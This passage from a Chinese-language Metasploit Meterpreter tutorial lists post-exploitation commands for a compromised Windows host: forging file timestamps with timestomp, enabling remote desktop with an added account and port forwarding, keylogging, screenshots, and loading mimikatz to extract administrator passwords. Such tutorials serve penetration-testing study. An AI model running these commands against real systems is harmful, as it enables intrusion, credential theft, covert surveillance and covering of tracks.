timestomp C://2.txt -f C://1.txt #将1.txt 的时间戳复制给 2.txt (-f 的参数是复制的意思,后面的复制给前面)(不能找正在运行的文件,将其日期赋值给别的文件,否则会失败的)

9.18. 查看盘的所有文件和时间

dir C:\\(双斜杠) #查看C盘所有文件及日期

9.19. enable_rdp 脚本开启3389(远程桌面连接)

run post/windows/manage/enable_rdp #开启远程桌面

run post/windows/manage/enable_rdp USERNAME=haoye PASSWORD=12345 #添加用户密码

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662

脚本位于:/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb

通过 rdp.rb 脚本可知:开启 rdp 是通过 reg 修改注册表;添加用户是调用 cmd.exe 通过net user 添加;

端口转发是利用 portfwd 命令。

9.20. 键盘记录(这个得靠运气)

keyscan_start #开启键盘记录

keyscan_dump #导出记录数据

keyscan_stop #结束键盘记录

9.21. 桌面抓图

screenshot

9.22. 获取系统管理密码

想直接添加账号进行提权,前面操作是不了,那么我们现在就出杀手锏,直接使用mimikatz来获取系统管理账号的密码。

第一步:载入mimikatz

  1. meterpreter > load mimikatz
    第二步:使用命令wdigest获取密码

其他详细信息,查看:http://xz.aliyun.com/t/2536(别人的博客)